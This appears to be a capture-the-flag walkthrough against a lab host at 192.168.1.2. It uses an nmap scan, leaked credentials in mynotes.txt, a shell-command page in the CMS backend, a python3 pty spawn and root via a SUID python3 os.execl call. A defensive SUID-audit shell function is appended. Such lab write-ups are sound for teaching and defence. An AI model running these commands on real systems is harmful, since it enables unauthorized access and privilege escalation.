Start by scanning the target with nmap -A -T4 -p- 192.168.1.2 -vv

While running dirb, I visited port 8080 and found that the page shows a picture of a note; viewing the page source we can see this:

So visiting 192.168.1.2:8080/mynotes.txt we find:

User admin
Password adminadmin2
Now, as I said, I was running dirb and it gave us some results; one of them is a login page at http://192.168.1.2/backend, where we log in with these credentials:

And we got in:

Now the CMS is PHP-restricted, meaning we can't upload .php or .php5 files, but we can put a simple shell command into a page on the site: navigate to http://192.168.1.2/backend/cms, add a page, and write a function inside it that calls the shell:

And as you can see we got in; then we upgrade to a proper TTY with python3 -c 'import pty; pty.spawn("/bin/bash")' and then bash -p

Now, using find / -perm -u=s -type f 2>/dev/null, we found that python3 has the SUID bit set, so we can use it to escalate privileges:

All we have to do is run one command and we are root:
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
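As an added defensive check, not part of the original walkthrough: the same find command that revealed the SUID python3 is what an administrator can run to audit a box for this misconfiguration. The POSIX shell function below lists SUID files under a given root and flags any whose name matches a scripting interpreter or shell, because a SUID interpreter lets any local user execute arbitrary code as the file's owner (root here). The function name audit_suid and the list of interpreter names are my own assumptions; the fix for a flagged file is chmod u-s on it.

```shell
#!/bin/sh
# audit_suid ROOT
# Prints one line per SUID file under ROOT:
#   "FLAG <path>" when the file name looks like an interpreter or shell
#   "suid <path>" for every other SUID file (review, but often legitimate: ping, sudo, passwd)
audit_suid() {
    root="$1"
    # -xdev keeps the walk on one filesystem; stderr is dropped for unreadable dirs
    find "$root" -xdev -perm -u=s -type f 2>/dev/null | while IFS= read -r f; do
        name=$(basename "$f")
        case "$name" in
            # constructed list of interpreters/shells that should never be SUID
            python*|perl*|ruby*|php*|node|lua*|bash|sh|dash|zsh|ksh)
                echo "FLAG $f" ;;
            *)
                echo "suid $f" ;;
        esac
    done
}

# Example run over the whole system (needs read access to the tree):
#   audit_suid /
# Remediation for a flagged interpreter, e.g. the python3 on this box:
#   chmod u-s /usr/bin/python3
```

Running audit_suid / on the target would print a FLAG line for the python3 binary; on a clean system only the expected setuid helpers (passwd, sudo, ping and similar) appear as plain suid lines.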
